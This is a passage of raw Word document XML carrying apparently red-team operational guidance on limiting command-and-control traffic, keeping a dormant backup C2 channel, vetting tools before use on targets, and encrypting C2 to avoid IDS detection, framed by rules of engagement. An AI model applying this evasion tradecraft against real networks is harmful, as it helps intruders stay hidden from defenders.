          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Who has recently logged into the system?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188F190E" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>MINIMIZE CALLBACK (C2) VOLUME</w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:anchor="minimize-callback-c2-volume" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44C0F7D1" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Unless a Host Based protection mechanism is triggered, it is more likely to be discovered or caught by a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>defenders</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> recognition and/or analysis of traffic on the network. To avoid early detection, it is always good tradecraft to limit the amount of traffic generated during the engagement. There are several general concepts that, if followed, increase the success of the engagement while decreasing the chances of being discovered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EFDC93" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Keep traffic internal to a network: One of the most common issues, and one you should always attempt to change, are the limited number of sensors inside a network. Most network protections are currently applied at the boundary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EDD077" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pivot command and control traffic to a minimal number of outbound sources: Maintain at least two outbound sources for C2 redundancy; however, only use one for operations (considered an interactive tier). The second (a long or short haul tier) is dormant or extremely slow to be used as a backup if/when the primary is discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B632FA2" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="5D7206AC">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="072741DB" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DON’T</w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:anchor="dont" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08162689" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>USE UNTESTED TOOLS ON A TARGET SYSTEM</w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:anchor="use-untested-tools-on-a-target-system" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54D0FD2E" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Before using a new tool (script, application, binary, process, etc.) on a target system, it must be tested, undergo an internal vetting process and be added to an official toolset. Does the tool have negative impacts on specific versions of an OS?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708DBC61" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Works fine on Windows 7 but causes system error in Windows </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0880B9F2" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Do you know if/what additional actions the tool performs?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6A312F" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool creates a covert channel for use inside the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEDC1B8" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This tool creates a private tunnel between host on a virtual interface; however, this creates a network </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>conflict</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="252DB465" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex: target net: 10.10.2.0/24, covert channel net: 10.10.2.0/24 - Hint: Don’t use these! Does the tool try to call home for updates?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E469A" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">At start or during a specific operation, the tool tries to poll home for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>updates</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52977FD3" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This can trigger defensive alerts identifying unauthorized persons or software on the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="190FA17D" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Does the tool attempt to run as a specific user or, worse, create a user/group? Keep these questions in mind before executing untested or unknown tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B2F81A" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>USE UNENCRYPTED CHANNELS FOR C2</w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:anchor="use-unencrypted-channels-for-c2" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77E4C00E" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Command and control data exiting the network must be encrypted. Clear text data, such as uploading a binary, issuing an operating system command or using a web shell will be detected by an IDS or other network </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> if in clear text. It has become common for IPS/IDS to detect specific strings discovered in clear text traffic. For example: "C:\Windows\System32" has become a common trigger for investigation. Some defenders have even gone the extra mile in legitimizing a potential threat. Assume the defender uses a remote administration tool on a regular basis. Ignoring recommendation, this traffic is unencrypted. Rather than alert each time the tool is used legitimately, the alert is configured to look for inconsistencies in the text. For example: most attackers are accustomed to typing lowercase commands in windows. The defender ignores "C:\Windows\System32" but alerts on "c:\windows\system32" Encryption of internal C2 traffic depends upon several different factors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA8C549" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Are there sensors inside the network?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA54015" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Are there other encrypted communications occurring between target systems?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5498592B" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Would encrypted traffic stand-out more than unencrypted traffic? Internal encryption is another example of where peers should be consulted to determine the best course of action before deploying C2 further into a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1A40E" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>ATTEMPT TO EXPLOIT OR ATTACK UNENCRYPTED WEBSITES</w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:anchor="attempt-to-exploit-or-attack-unencrypted-websites" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B1F9A55" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>As tempting as it may be, do not attack unencrypted websites. Simple attacks can trigger IDS. Always know your target IP space. There are likely several websites available for review. Proper reconnaissance and/or coordination should have discovered each. Create a list of sites in your target log. Include IP, URLs, an educated guess at the function, ports, protocols, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2670826D" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Important Note! Prior to performing any exploitation and attacks against a web server, refer to your rules of engagement and fully understand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45485761" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Who </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>actually owns</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the website?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034CFE88" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Who owns the system where the website is hosted? Who owns the backend application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD5629" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
